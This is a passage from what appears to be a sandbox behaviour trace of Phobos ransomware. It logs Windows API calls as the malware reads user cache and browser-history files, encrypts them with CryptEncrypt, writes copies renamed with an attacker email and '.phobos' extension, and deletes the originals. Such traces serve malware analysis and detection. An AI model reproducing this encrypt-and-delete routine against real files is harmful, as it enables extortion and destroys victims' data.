"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.827] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.827] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.828] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.828] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.828] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1ea08, lpOverlapped=0x0) returned 1 [0167.862] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ea10, dwBufLen=0x1ea10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ea10) returned 1 [0167.870] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1ea10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1ea10, lpOverlapped=0x0) returned 1 [0167.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.880] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.880] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0167.880] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.880] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x162, lpOverlapped=0x0) returned 1 [0167.880] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.880] CloseHandle (hObject=0x158) returned 1 [0167.880] CloseHandle (hObject=0x130) returned 1 [0167.880] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db")) returned 1 [0167.882] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.883] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=134744) returned 1 [0167.883] CloseHandle (hObject=0x130) returned 1 [0167.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")) returned 0x2020 [0167.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.883] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.883] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.884] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.884] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.884] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x20e58, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20e60, dwBufLen=0x20e60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20e60) returned 1 [0168.053] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x20e60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x20e60, lpOverlapped=0x0) returned 1 [0168.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.055] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0168.055] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.055] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x162, lpOverlapped=0x0) returned 1 [0168.055] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.055] CloseHandle (hObject=0x130) returned 1 [0168.055] CloseHandle (hObject=0x158) returned 1 [0168.055] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")) returned 0 [0168.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.056] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=65536) returned 1 [0168.056] CloseHandle (hObject=0x158) returned 1 [0168.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat")) returned 0x2026 [0168.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.056] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.057] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0168.057] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.057] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10000, lpOverlapped=0x0) returned 1 [0168.069] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10010, dwBufLen=0x10010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10010) returned 1 [0168.070] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10010, lpOverlapped=0x0) returned 1 [0168.071] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0168.071] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.071] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.071] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.071] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.071] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.071] CloseHandle (hObject=0x158) returned 1 [0168.071] CloseHandle (hObject=0x130) returned 1 [0168.072] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012019041320190414\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012019041320190414\\index.dat")) returned 1 [0168.073] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.117] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0168.117] CloseHandle (hObject=0x158) returned 1 [0168.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat")) returned 0x2026 [0168.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.117] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.117] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.117] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.118] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0168.233] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0168.233] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0168.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.235] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.235] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.235] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.235] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.235] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.235] CloseHandle (hObject=0x158) returned 1 [0168.235] CloseHandle (hObject=0x190) returned 1 [0168.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat")) returned 1 [0168.237] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.237] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.237] CloseHandle (hObject=0x190) returned 1 [0168.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini")) returned 0x2026 [0168.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.238] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.238] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.239] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.239] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.240] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.240] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.241] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.241] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.241] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.241] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.241] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.241] CloseHandle (hObject=0x190) returned 1 [0168.241] CloseHandle (hObject=0x158) returned 1 [0168.241] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\desktop.ini")) returned 1 [0168.242] CryptGenRandom (in: hProv=0xa24cf8, 